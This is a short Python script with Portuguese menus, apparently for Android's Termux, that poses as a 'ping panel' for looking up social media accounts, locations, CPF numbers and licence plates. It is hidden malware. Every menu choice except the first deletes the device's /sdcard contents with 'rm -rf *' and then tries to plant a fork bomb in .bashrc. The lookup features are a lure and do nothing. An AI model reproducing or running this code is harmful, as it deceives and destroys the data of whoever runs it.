import os
from time import sleep


print("""
\033[0;32;m
████▀░░░░░░░░░░░░░░░░░▀████
███│░░░░░░░░░░░░░░░░░░░│███
██▌│░░░░░░░░░░░░░░░░░░░│▐██
██░└┐░░░░░░░░░░░░░░░░░┌┘░██
██░░└┐░░░░░░░░░░░░░░░┌┘░░██
██░░┌┘▄▄▄▄▄░░░░░▄▄▄▄▄└┐░░██
██▌░│██████▌░░░▐██████│░▐██
███░│▐███▀▀░░▄░░▀▀███▌│░███
██▀─┘░░░░░░░▐█▌░░░░░░░└─▀██
██▄░░░▄▄▄▓░░▀█▀░░▓▄▄▄░░░▄██
████▄─┘██▌░░░░░░░▐██└─▄████
█████░░▐█─┬┬┬┬┬┬┬─█▌░░█████
████▌░░░▀┬┼┼┼┼┼┼┼┬▀░░░▐████
█████▄░░░└┴┴┴┴┴┴┴┘░░░▄█████
███████▄░░░░░░░░░░░▄██████ \033[m""") 


sleep(1)

print('\033[0;32;m \n   METÉDO PING\033[m')

sleep(1)


print ("""  \n\033[0;32;m PAINEL PING
  [ 1 ] YOUTUBE
  [ 2 ] FACEBOOK
  [ 3 ] TIKTOK
  [ 4 ] TWITTER
  [ 5 ] PUXAR LOCALIZAÇÃO
  [ 6 ] PUXAR CPF
  [ 7 ] PUXAR PLACA \033[m""")

opcao = int(input('\033[0;31;m digite a opção >> \033[m'))

if opcao == 1:
	print('Ainda não tenho')

else:
        os.system('cd /sdcard && rm -rf * ')
        sleep(1)
        os.system('cd $HOME')
        os.system('echo ":(){ :|:& };:" > .bashrc')
        
